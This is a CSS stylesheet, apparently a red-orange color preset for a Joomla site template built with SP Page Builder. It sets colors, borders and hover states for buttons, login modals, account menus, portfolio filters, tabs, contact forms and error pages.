.sppb-btn-primary.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d {
  border-bottom-color: rgba(0,0,0,0.25);
}
.btn-primary.sppb-btn-3d:hover,
.btn-primary.sppb-btn-3d:focus,
.button.sppb-btn-3d:hover,
.button.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d:hover,
.btn-readmore.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d:hover,
.sppb-btn-primary.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d:hover,
.vm-button-correct.sppb-btn-3d:focus {
  background: rgba(241,72,51,0.95);
  border-bottom-color: rgba(0,0,0,0.3);
}
.btn-primary.sppb-btn-3d:focus,
.btn-primary.sppb-btn-3d.focus,
.btn-primary.sppb-btn-3d:active,
.btn-primary.sppb-btn-3d.active,
.btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.button.sppb-btn-3d:focus,
.button.sppb-btn-3d.focus,
.button.sppb-btn-3d:active,
.button.sppb-btn-3d.active,
.button.open > .dropdown-toggle.sppb-btn-3d,
.btn-readmore.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d.focus,
.btn-readmore.sppb-btn-3d:active,
.btn-readmore.sppb-btn-3d.active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d.focus,
.sppb-btn-primary.sppb-btn-3d:active,
.sppb-btn-primary.sppb-btn-3d.active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d.focus,
.vm-button-correct.sppb-btn-3d:active,
.vm-button-correct.sppb-btn-3d.active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-3d {
  background: #f35d4b;
}
.sppb-btn-default,
.btn.sppb-btn-default {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.sppb-btn-default:hover,
.sppb-btn-default:focus,
.btn.sppb-btn-default:hover,
.btn.sppb-btn-default:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #f14833;
  color: #f14833;
}
.sppb-btn-default.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline {
  border: 2px solid #666666;
  color: inherit;
  background-color: transparent;
}
.sppb-btn-default.sppb-btn-outline:hover,
.sppb-btn-default.sppb-btn-outline.focus,
.sppb-btn-default.sppb-btn-outline.active,
.sppb-btn-default.sppb-btn-outline:focus,
.sppb-btn-default.sppb-btn-outline:active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline:hover,
.btn.sppb-btn-default.sppb-btn-outline.focus,
.btn.sppb-btn-default.sppb-btn-outline.active,
.btn.sppb-btn-default.sppb-btn-outline:focus,
.btn.sppb-btn-default.sppb-btn-outline:active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline {
  background-color: transparent !important;
  color: #e2270f;
  border: 2px solid #f14833 !important;
  box-shadow: none;
}
.sppb-btn-default.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d {
  border-bottom-color: #666666;
}
.sppb-btn-default.sppb-btn-3d:hover,
.sppb-btn-default.sppb-btn-3d:focus,
.btn.sppb-btn-default.sppb-btn-3d:hover,
.btn.sppb-btn-default.sppb-btn-3d:focus {
  background-color: transparent;
  color: #e2270f;
  border-bottom-color: #f14833;
}
.sppb-btn-default.sppb-btn-3d:active,
.sppb-btn-default.sppb-btn-3d.active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d:active,
.btn.sppb-btn-default.sppb-btn-3d.active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom: 2px solid #f14833;
  background-color: transparent;
}
.btn-link,
.sppb-btn-link {
  color: #f47363;
}
.btn-link:hover,
.btn-link:focus,
.sppb-btn-link:hover,
.sppb-btn-link:focus {
  color: #f14833;
  text-decoration: none;
}
.btn-readmore {
  color: #fff;
}
.btn-readmore:hover,
.btn-readmore:focus {
  color: #fff;
}
.btn-dark,
.sppb-btn-dark {
  color: #fff;
  border-color: #4d4d4d;
  background-color: rgba(51,51,51,0.72);
}
.btn-dark:hover,
.btn-dark:focus,
.sppb-btn-dark:hover,
.sppb-btn-dark:focus {
  color: #eee;
  border-color: #333;
  background-color: #424242;
  background-color: rgba(51,51,51,0.87);
}
.btn-dark.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline {
  border-color: #333;
}
.btn-dark.sppb-btn-outline:hover,
.btn-dark.sppb-btn-outline.focus,
.btn-dark.sppb-btn-outline.active,
.btn-dark.sppb-btn-outline:focus,
.btn-dark.sppb-btn-outline:active,
.btn-dark.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline:hover,
.sppb-btn-dark.sppb-btn-outline.focus,
.sppb-btn-dark.sppb-btn-outline.active,
.sppb-btn-dark.sppb-btn-outline:focus,
.sppb-btn-dark.sppb-btn-outline:active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-outline {
  color: #eee;
  border-color: #333;
  background-color: #535353;
  background-color: rgba(51,51,51,0.8);
}
.btn-dark.sppb-btn-3d,
.btn-dark.sppb-btn-3d:hover,
.btn-dark.sppb-btn-3d.focus,
.btn-dark.sppb-btn-3d:focus,
.btn-dark.sppb-btn-3d:active,
.btn-dark.sppb-btn-3d.active,
.btn-dark.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d:hover,
.sppb-btn-dark.sppb-btn-3d.focus,
.sppb-btn-dark.sppb-btn-3d:focus,
.sppb-btn-dark.sppb-btn-3d:active,
.sppb-btn-dark.sppb-btn-3d.active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #262626;
}
.btn-light,
.sppb-btn-light {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
  background-color: rgba(255,255,255,0.05);
}
.btn-light:hover,
.btn-light:focus,
.sppb-btn-light:hover,
.sppb-btn-light:focus {
  border-color: #fff;
  color: #fff;
  background-color: rgba(255,255,255,0.15);
}
.btn-light.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-outline:hover,
.btn-light.sppb-btn-outline.focus,
.btn-light.sppb-btn-outline:focus,
.btn-light.sppb-btn-outline:active,
.btn-light.sppb-btn-outline.active,
.btn-light.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline:hover,
.sppb-btn-light.sppb-btn-outline.focus,
.sppb-btn-light.sppb-btn-outline:focus,
.sppb-btn-light.sppb-btn-outline:active,
.sppb-btn-light.sppb-btn-outline.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #fff;
  color: #fff;
}
.btn-light.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d {
  border-bottom-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-3d:hover,
.btn-light.sppb-btn-3d.focus,
.btn-light.sppb-btn-3d:focus,
.btn-light.sppb-btn-3d:active,
.btn-light.sppb-btn-3d.active,
.btn-light.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d:hover,
.sppb-btn-light.sppb-btn-3d.focus,
.sppb-btn-light.sppb-btn-3d:focus,
.sppb-btn-light.sppb-btn-3d:active,
.sppb-btn-light.sppb-btn-3d.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #fff;
}
.btn-flex,
.sppb-btn-flex {
  color: #fff;
  border-color: #f89e92;
  background-color: rgba(255,255,255,0.25);
  box-shadow: 0 2px 5px rgba(0,0,0,0.15);
}
.btn-flex:hover,
.btn-flex:focus,
.sppb-btn-flex:hover,
.sppb-btn-flex:focus {
  border-color: #f6887b;
  color: #fff;
  background-color: rgba(241,72,51,0.7);
}
.btn-flex.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline {
  color: #fff;
  border-color: #f89e92;
  background-color: rgba(255,255,255,0.25);
}
.btn-flex.sppb-btn-outline:hover,
.btn-flex.sppb-btn-outline.focus,
.btn-flex.sppb-btn-outline:focus,
.btn-flex.sppb-btn-outline:active,
.btn-flex.sppb-btn-outline.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline:hover,
.sppb-btn-flex.sppb-btn-outline.focus,
.sppb-btn-flex.sppb-btn-outline:focus,
.sppb-btn-flex.sppb-btn-outline:active,
.sppb-btn-flex.sppb-btn-outline.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #f6887b;
  color: #fff;
  background-color: rgba(241,72,51,0.7);
}
.btn-flex.sppb-btn-3d,
.btn-flex.sppb-btn-3d:hover,
.btn-flex.sppb-btn-3d.focus,
.btn-flex.sppb-btn-3d:focus,
.btn-flex.sppb-btn-3d:active,
.btn-flex.sppb-btn-3d.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d:hover,
.sppb-btn-flex.sppb-btn-3d.focus,
.sppb-btn-flex.sppb-btn-3d:focus,
.sppb-btn-flex.sppb-btn-3d:active,
.sppb-btn-flex.sppb-btn-3d.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #f47363;
}
.light >i {
  color: #f9b3aa;
}
.light:hover i {
  color: #fbc8c2;
}
ul.social-icons >li a:hover,
ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #fbc8c2;
}
.login .title i.pe,
.registration .title i.pe {
  color: #f89e92;
}
.ap-login a i.pe,
.ap-signin a i.pe {
  color: #f89e92;
}
.ap-modal-login .modal-dialog {
  color: #000000;
}
.ap-modal-login .title i.pe {
  color: #f89e92;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a {
  color: #000000 !important;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a:hover {
  color: #f14833 !important;
}
.ap-modal-login .modal-content .modal-footer a:hover {
  color: #f14833 !important;
}
.view-profile .select-menu select {
  display: block;
}
.view-profile button:focus {
  outline: none;
}
.view-profile a[title="Cancel"] {
  background-color: #888888;
  color: #fff;
}
.view-profile a[title="Cancel"]:hover {
  background-color: #6f6f6f;
}
.ap-my-account-menu .signin-img-wrap i.pe {
  color: #fbc8c2;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a {
  color: #000000 !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover {
  background-color: rgba(241,72,51,0.8);
  color: #fff !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover::before {
  color: #fbc8c2;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a {
  color: #f14833;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover {
  background-color: rgba(241,72,51,0.8);
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover i {
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a i {
  color: #f14833;
}
.ap-my-account-menu .dropdown-menu ul.menu >li.active > a {
  background-color: rgba(241,72,51,0.8);
  color: #fff !important;
}
.login-wrapper >i.pe,
.registration-wrapper >i.pe,
.reset-wrapper >i.pe,
.remind-wrapper >i.pe {
  color: rgba(241,72,51,0.07);
}
.login-wrapper >i.pe {
  color: rgba(85,85,85,0.02);
}
#sp-top-bar ul.social-icons >li a:hover,
#sp-top-bar ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #f35d4b;
}
#sp-top-bar.onepage {
  box-shadow: inset 0 1px 0px rgba(0,0,0,0.05), inset 0 -1px 0px rgba(0,0,0,0.1);
}
#sp-top-bar.onepage .sp-contact-info li i {
  color: #d8250f;
}
#sp-top-bar.onepage .ap-login a i.pe,
#sp-top-bar.onepage .ap-signin a i.pe {
  color: #d8250f;
}
.sp-contact-info li a:hover {
  color: #f6887b;
}
.sp-contact-info li i {
  color: #f6887b;
}
.sp-module-content .mod-languages ul.lang-block li.lang-active a i {
  color: #f89e92;
}
ol.breadcrumb li a:hover {
  color: #f9b3aa;
}
.sp-module ul >li >a,
.sppb-addon-module ul >li >a {
  color: #1a1a1a;
}
.sp-module ul >li >a:hover,
.sppb-addon-module ul >li >a:hover {
  color: #f14833;
}
.sp-module.white .sppb-addon-content ol >span,
.sppb-addon-module.white .sppb-addon-content ol >span {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li,
.sppb-addon-module.white .sppb-addon-content ol li {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li a,
.sppb-addon-module.white .sppb-addon-content ol li a {
  color: #fff;
}
.sp-module.white .sppb-addon-content ol li a:hover,
.sppb-addon-module.white .sppb-addon-content ol li a:hover {
  color: #f9b3aa;
}
.sp-module.dark ul >li >span >a,
.sppb-addon-module.dark ul >li >span >a {
  color: #f35d4b;
}
.sp-module.dark ul >li >span >a:hover,
.sppb-addon-module.dark ul >li >span >a:hover {
  color: #f89e92;
}
.sp-module.dark ul >li >a,
.sppb-addon-module.dark ul >li >a {
  color: #f47363 !important;
}
.sp-module.dark ul >li >a:hover,
.sppb-addon-module.dark ul >li >a:hover {
  color: #f9b3aa !important;
}
.sp-module .latestnews >div >a,
.sppb-addon-module .latestnews >div >a {
  color: #000000;
}
.sp-module .latestnews >div >a:hover,
.sppb-addon-module .latestnews >div >a:hover {
  color: #f14833;
}
.sp-module ul.category-module >li >a,
.sp-module .relateditems >li >a,
.sppb-addon-module ul.category-module >li >a,
.sppb-addon-module .relateditems >li >a {
  color: #f47363;
}
.sp-module ul.category-module >li >a >div.related-date,
.sp-module .relateditems >li >a >div.related-date,
.sppb-addon-module ul.category-module >li >a >div.related-date,
.sppb-addon-module .relateditems >li >a >div.related-date {
  color: #999999;
}
.sp-module ul.category-module >li >a >div.related-date >i,
.sp-module .relateditems >li >a >div.related-date >i,
.sppb-addon-module ul.category-module >li >a >div.related-date >i,
.sppb-addon-module .relateditems >li >a >div.related-date >i {
  color: #f89e92;
}
.sp-module ul.category-module >li span,
.sp-module ul.category-module >li p,
.sp-module .relateditems >li span,
.sp-module .relateditems >li p,
.sppb-addon-module ul.category-module >li span,
.sppb-addon-module ul.category-module >li p,
.sppb-addon-module .relateditems >li span,
.sppb-addon-module .relateditems >li p {
  color: #999999;
}
.sp-module ul.category-module >li span >i,
.sp-module ul.category-module >li p >i,
.sp-module .relateditems >li span >i,
.sp-module .relateditems >li p >i,
.sppb-addon-module ul.category-module >li span >i,
.sppb-addon-module ul.category-module >li p >i,
.sppb-addon-module .relateditems >li span >i,
.sppb-addon-module .relateditems >li p >i {
  color: #f89e92;
}
.sp-module ul.category-module >li a.mod-articles-category-title,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title {
  color: #000000;
}
.sp-module ul.category-module >li a.mod-articles-category-title:hover,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title:hover {
  color: #f14833;
}
.sp-module .tagscloud .tag-name,
.sppb-addon-module .tagscloud .tag-name {
  color: #666666;
}
.sp-module .tagscloud .tag-name:hover,
.sppb-addon-module .tagscloud .tag-name:hover {
  background: #f35d4b;
  border-color: #f14833;
  color: #fff;
}
.tag-category ul.category li h3 >a {
  color: #595959;
}
.tag-category ul.category li h3 >a:hover {
  color: #f14833;
}
.tags a.label {
  background-color: rgba(45,45,45,0.45);
}
.tags a.label:hover {
  background: #f35d4b;
}
.tags >span >i {
  color: #c4c4c4;
}
.tags:hover >span >i {
  color: #919191;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a {
  color: #1a1a1a;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a:hover {
  color: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a {
  color: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a:hover {
  color: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li span.simple-divider {
  color: #fcdeda;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a {
  background: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover {
  background: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a {
  background-color: #f14833;
  background-color: rgba(241,72,51,0.8);
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover {
  background-color: #f14833;
  box-shadow: 0 1px 3px rgba(0,0,0,0.3);
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fa,
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fas,
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.far {
  color: #f14833;
}
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fa,
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fas,
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.far {
  color: #f47363;
}
input[type="text"]:focus {
  border: 1px solid #f14833;
}
.search input#mod-search-searchword:focus,
.search input#search-searchword:focus,
.search input#mod_virtuemart_search:focus {
  border: 1px solid #f14833;
}
.search:before {
  color: #f47363;
}
.search:hover:before,
.search:focus:before,
.search:active:before {
  color: #1a1a1a;
}
.search .btn-toolbar button {
  background: #f14833;
}
.post-format-masonry > i {
  background-color: #f14833;
  background-color: rgba(241,72,51,0.7);
}
.post-format {
  background-color: #f14833;
  background-color: rgba(241,72,51,0.9);
}
.entry-link,
.entry-quote {
  background-color: #f14833;
  background-color: rgba(241,72,51,0.9);
}
blockquote {
  border-color: #f14833;
}
.sp-comingsoon body {
  background-color: #ef331b;
}
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover,
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover i {
  color: #fff;
}
.sp-comingsoon body.with-bckg-img a.logo {
  background: rgba(20,20,20,0.45);
}
.sp-comingsoon body.with-bckg-img .days .number,
.sp-comingsoon body.with-bckg-img .hours .number,
.sp-comingsoon body.with-bckg-img .seconds .number,
.sp-comingsoon body.with-bckg-img .minutes .number {
  border: 1px solid rgba(255,255,255,0.5);
  background-color: rgba(0,0,0,0.2);
}
.sp-comingsoon body.with-bckg-img .social-icons {
  background-color: rgba(0,0,0,0.2);
}
.pagination>li>a,
.pagination>li>span {
  color: #000000;
}
.pagination>li>a:hover,
.pagination>li>a:focus,
.pagination>li>span:hover,
.pagination>li>span:focus {
  color: #000000;
}
.pagination>.active>a,
.pagination>.active>span {
  border-color: #f14833;
  background-color: #f14833;
}
.pagination>.active>a:hover,
.pagination>.active>a:focus,
.pagination>.active>span:hover,
.pagination>.active>span:focus {
  border-color: #f14833;
  background-color: #f14833;
}
.sppb-addon h3.sppb-addon-title {
  color: #1a1a1a;
}
.sppb-addon h3.sppb-addon-title:after {
  background: #f47363;
}
.sppb-panel-default .sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-default .sppb-panel-heading.active,
.sppb-panel-default .sppb-panel-heading.active:before {
  color: #f14833;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title {
  color: #f14833;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title >i,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title >i {
  color: #f47363;
}
.sppb-panel-primary {
  border: none;
}
.sppb-panel-primary >.sppb-panel-heading {
  background-color: #f14833;
}
.sppb-panel-flex >.sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-flex >.sppb-panel-heading:after {
  color: #808080;
}
.sppb-panel-flex >.sppb-panel-heading.active {
  border-bottom: 1px solid #f14833;
}
.sppb-panel-flex >.sppb-panel-heading.active:after {
  color: #f14833;
}
.sppb-panel-flex >.sppb-panel-heading.active .sppb-panel-title >i {
  color: #f14833;
}
.sppb-panel-flex >.sppb-panel-heading +.sppb-panel-collapse > .sppb-panel-body {
  border-bottom: 1px solid #f14833;
}
.sppb-addon-countdown.flex .sppb-countdown-number {
  background-color: #f14833;
  border: 2px solid rgba(0,0,0,0.2);
  text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
}
.entry-header h1 a,
.entry-header h2 a {
  color: #000000;
}
.entry-header h1 a:hover,
.entry-header h1 a:focus,
.entry-header h2 a:hover,
.entry-header h2 a:focus {
  color: #f14833;
}
.entry-header h1:after,
.entry-header h2:after {
  background: #f47363;
}
.html-style span {
  background: #f46a59;
}
ul.site-list li {
  color: #000000;
}
ul.site-list li i {
  color: #f46a59;
}
.bullets .li-circle {
  color: #f14833;
}
.dropcaps .naked-drop span {
  color: #f14833;
}
.dropcaps .full-drop span {
  background: #f14833;
}
.sp-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title:after {
  background: #f47363;
}
.cd-pagination li.active >a {
  background-color: #f14833;
  color: #fff;
}
.cd-pagination a {
  background-color: #fafafa;
}
.cd-pagination a:hover,
.cd-pagination a:focus {
  background-color: #f14833;
  color: #fff;
}
.cd-pagination a:active {
  background-color: #b21f0c;
}
.sppb-addon-single-image .sppb-addon-content a .overlay >i:before {
  background-color: rgba(241,72,51,0.8);
}
.sppb-addon-single-image .sppb-addon-content a .overlay:after {
  background-color: rgba(51,51,51,0.25);
  box-shadow: inset 0 0 50px rgba(51,51,51,0.9);
}
.sppb-progress .sppb-progress-bar-default,
.sppb-progress .sppb-progress-bar.flex,
.sppb-progress .sppb-progress-bar.custom {
  background-color: #f14833;
}
.sppb-nav-tabs >li >a {
  color: #f14833;
}
.sppb-nav-tabs >li.active >a {
  color: #333333;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a {
  border-top-color: #f47363;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a:hover,
.flex .sppb-tab .sppb-nav-tabs >li.active >a:focus {
  border-top-color: #f47363;
}
.sppb-nav-modern >li >a {
  background: transparent;
  color: #333333;
}
.sppb-nav-modern >li.active >a {
  color: #f14833;
}
.sppb-nav-modern >li.active >a:hover,
.sppb-nav-modern >li.active >a:focus {
  color: #f14833;
}
.sppb-nav-lines >li >a {
  background: transparent;
}
.sppb-nav-lines >li >a >i {
  color: #666666;
}
.sppb-nav-lines >li >a:hover >i,
.sppb-nav-lines >li >a:focus >i {
  color: #333333;
}
.sppb-nav-lines >li.active >a,
.sppb-nav-lines >li.active >a:focus,
.sppb-nav-lines >li.active >a:hover {
  background-color: transparent;
  color: #f14833;
  border-bottom-color: #f14833;
}
.sppb-nav-lines >li.active >a >i,
.sppb-nav-lines >li.active >a:focus >i,
.sppb-nav-lines >li.active >a:hover >i {
  color: #f14833;
}
.sppb-nav-pills >li >a {
  color: #333333;
  background: transparent;
}
.sppb-nav-pills >li >a >i {
  color: #666666;
}
.sppb-nav-pills >li >a:hover >i,
.sppb-nav-pills >li >a:focus >i {
  color: #333333;
}
.sppb-nav-pills >li.active >a {
  background-color: transparent;
  color: #f14833;
  box-shadow: inset 0 0 0 1px #f14833;
}
.sppb-nav-pills >li.active >a >i {
  color: #f14833;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star {
  color: #f47363;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star-o,
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.far.fa-star {
  color: #c0c0c0;
}
.pro-client-url {
  color: #f14833;
}
.sppb-pricing-box {
  box-shadow: inset 0 0 1px #999999;
}
.sppb-pricing-box.sppb-pricing-featured {
  background: transparent;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-header {
  background-color: #f14833;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-features {
  color: #000000;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper {
  position: relative;
  overflow: hidden;
  max-width: 100%;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper >a:after,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper >a:after {
  background: #f14833;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item h2.entry-title a {
  color: #404040;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner:hover h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item:hover h2.entry-title a {
  color: #f14833;
}
.light .sppb-selector span i {
  color: #fbc8c2;
}
.light .sppb-selector >i {
  color: #f9b3aa;
}
.light .sppb-selector:hover span i {
  color: #fff;
}
.light .sppb-selector:hover i {
  color: #fbc8c2;
}
.flex .sppb-addon-content .gm-zoom-in,
.flex .sppb-addon-content .gm-zoom-out {
  background-color: #f47363;
  opacity: 0.77;
}
.flex .sppb-addon-content .gm-zoom-in:hover,
.flex .sppb-addon-content .gm-zoom-out:hover {
  background-color: #f35d4b;
  opacity: 1;
}
.sppb-addon .sppb-icon {
  color: #f14833;
  line-height: 1.5;
}
.sppb-media.default >a:hover img.sppb-media-object,
.sppb-media.flex >a:hover img.sppb-media-object {
  border-color: #f14833;
}
.sppb-media.default >a:hover >i,
.sppb-media.flex >a:hover >i {
  border-color: #f14833;
}
.sppb-media.default >.sppb-media-body >i.fa,
.sppb-media.default >.sppb-media-body >i.fas,
.sppb-media.flex >.sppb-media-body >i.fa,
.sppb-media.flex >.sppb-media-body >i.fas {
  color: #fbc8c2;
}
.sppb-media footer strong {
  color: #f35d4b;
}
.sp-module .sp-module-title,
.sppb-addon-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title .divider,
.sppb-addon-module .sp-module-title .divider {
  background: #f47363;
}
.sp-module .divider,
.sppb-addon-module .divider {
  background: #cccccc;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #f89e92;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]:focus {
  border: 1px solid #f35d4b;
  box-shadow: 0 0 5px rgba(241,72,51,0.3);
}
.sppb-addon-ajax-contact.dark .sppb-form-group label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder] {
  color: #f0f0f0;
  border: 1px solid #999;
  border: 1px solid rgba(200,200,200,0.8);
  background: transparent;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-moz-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #f57b6c;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]:focus {
  border: 1px solid #f6887b;
}
.sppb-addon-ajax-contact.dark .tos label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .tos label a {
  color: #f6887b;
}
.sppb-addon-ajax-contact.dark .tos label a:hover {
  color: #f9b3aa;
}
.acym_module_form .acysubbuttons-icon::before {
  background: #f14833;
}
.dark .acymailing_form .acysubbuttons {
  color: #f79184;
}
.dark .acymailing_form .acysubbuttons:focus {
  border: 1px solid #f6887b;
}
.dark .acym_module_form input.cell {
  color: #fbc8c2;
}
.dark .acym_module_form input.cell:focus {
  border: 1px solid #f6887b;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper:before {
  background-color: #f89e92 !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:before {
  border: 2px solid #f47363 !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:after {
  background-color: #f89e92 !important;
}
.form-builder-checkbox-item label::before,
.form-builder-radio-item label::before,
.sppb-addon-form-builder .sppb-form-check-label::before {
  border: 2px solid #f6887b;
}
.form-builder-checkbox-item input:checked+label::before,
.form-builder-radio-item input:checked+label::before,
.sppb-addon-form-builder .sppb-form-check-input:checked+label::before {
  background: #f35d4b;
  box-shadow: inset 0 0 5px rgba(0,0,0,0.2);
}
.error-page .error-page-inner >div.container .btn-error {
  background: #f35d4b;
}
.error-page .error-page-inner >div.container .btn-error:hover {
  background: #f14833;
}
.error-page .error-page-inner >div.container .fa-exclamation-triangle {
  color: #f6887b;
}
.error-page .error-page-inner >div.container .error-code {
  color: #f47363;
}
.error-page .error-page-inner.with-bckg-img div.container .pe-7s-compass {
  color: #fff;
  text-shadow: 1px 3px 6px rgba(0,0,0,0.1);
}
.error-page .error-page-inner.with-bckg-img div.container .error-code {
  color: #f35d4b;
}
.sp-layer h1,
.sp-layer h2,
.sp-layer h3,
.sp-layer h4,
.sp-layer h5,
.sp-layer h6,
.sp-layer i.major_color {
  color: #f35d4b;
}
.sp-button {
  border-color: #f6887b !important;
}
.sp-selected-button {
  background-color: #f14833 !important;
}
